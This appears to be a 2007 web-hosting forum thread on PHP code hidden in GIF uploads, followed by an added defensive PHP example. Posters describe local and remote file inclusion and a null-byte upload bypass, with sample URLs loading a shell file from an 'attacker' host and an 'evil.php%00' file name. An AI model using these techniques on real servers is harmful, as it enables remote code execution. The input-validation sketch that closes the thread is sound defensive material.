

PHP/GIF Exploit




Posted by SI-Chris, 06-23-2007, 05:47 PM
I read about a new exploit that embeds PHP code in a GIF file: http://news.com.com/8301-10784_3-9731991-7.html How would that work exactly? Wouldn't a server have to be set up specifically to parse PHP code in GIF files? Who would set up their server that way? Is there a way around that so you can remotely trick the server into parsing GIF files as PHP code?

Posted by b3nz, 06-23-2007, 06:08 PM
I didn't read this article, but there are some ways to embed PHP code in a file with any extension you like! Local File Inclusion and Remote File Inclusion are the main methods! Of course you can upload a PHP shell with a .php.gif extension using null bytes like %00 in some portals. Anyway, yes, it's possible and it's not an exploit.

Posted by SI-Chris, 06-23-2007, 06:34 PM
According to the article (it's only a few paragraphs long), the code is executed when someone tries to view the image after it's uploaded. So I don't understand how that would work unless someone had specifically configured their server to parse .gif files as PHP, and again, who would do that? Is there something I'm missing?

Posted by b3nz, 06-23-2007, 06:51 PM
Imagine that there's a vulnerable portal installed on a server which allows you to execute local files with a URL like http://victim/script.php?variable=[file-address], so you upload a file such as cmd.gif as your avatar or ... in that script and then you use the URL for executing it. Another way, called RFI (remote file inclusion), allows you to include a file with any extension, like cmd.gif, from a foreign host. Look at this code: Now the attacker can use http://victim/script.php?var=http://attacker/cmd.gif and execute his code on the server. And there's another vulnerability in some scripts which upload files to the server: the attacker wants to upload his evil.php to the server but the script doesn't allow .php files to be uploaded, so the attacker renames his file to evil.php%00 (%00 is a null byte) and tricks the script.
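
The three weaknesses named in this thread (a request parameter passed to an include, inclusion of a remote URL, and an upload filter fooled by a null byte) all come down to letting client input choose a path. The sketch below is an added example, not code from the thread or from any portal it mentions; `PAGES`, `resolve_page()` and `store_avatar_name()` are hypothetical names and the inputs are constructed.

```php
<?php
// Added example. PAGES, resolve_page() and store_avatar_name() are hypothetical names.

// The request parameter is only ever a key into this fixed map, never a path or URL.
const PAGES = ['home' => 'home.php', 'profile' => 'profile.php'];

function resolve_page(string $key): ?string
{
    return isset(PAGES[$key]) ? __DIR__ . '/pages/' . PAGES[$key] : null;
}

// Returns the server-chosen file name for an uploaded avatar, or null to reject it.
function store_avatar_name(string $clientName, string $firstBytes): ?string
{
    if (strpos($clientName, "\0") !== false) {
        return null; // NUL byte in the submitted name (the decoded form of %00)
    }
    $ext = strtolower(pathinfo(basename($clientName), PATHINFO_EXTENSION));
    if (!in_array($ext, ['gif'], true)) {
        return null; // only the final extension counts, and it must be allow-listed
    }
    if (strncmp($firstBytes, 'GIF87a', 6) !== 0 && strncmp($firstBytes, 'GIF89a', 6) !== 0) {
        return null; // not a GIF header
    }
    // A valid header does not prove the rest of the file is free of PHP code, so
    // the stored name is generated here and resolve_page() never accepts a path.
    return bin2hex(random_bytes(16)) . '.gif';
}

// Constructed inputs modelled on the values quoted in the thread.
foreach (['home', '../avatars/cmd.gif', 'http://attacker/cmd.gif'] as $key) {
    printf("page %-26s => %s\n", $key, resolve_page($key) ?? 'rejected');
}
foreach (["cmd.gif", "evil.php\0", "evil.php\0.gif", "cmd.php"] as $name) {
    $stored = store_avatar_name($name, "GIF89a\x01\x00\x01\x00");
    printf("upload %-14s => %s\n", addcslashes($name, "\0"), $stored ?? 'rejected');
}
```

Because the include target comes from the map and the stored file name comes from the server, an uploaded GIF that carries PHP in its body is only ever served as an image.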


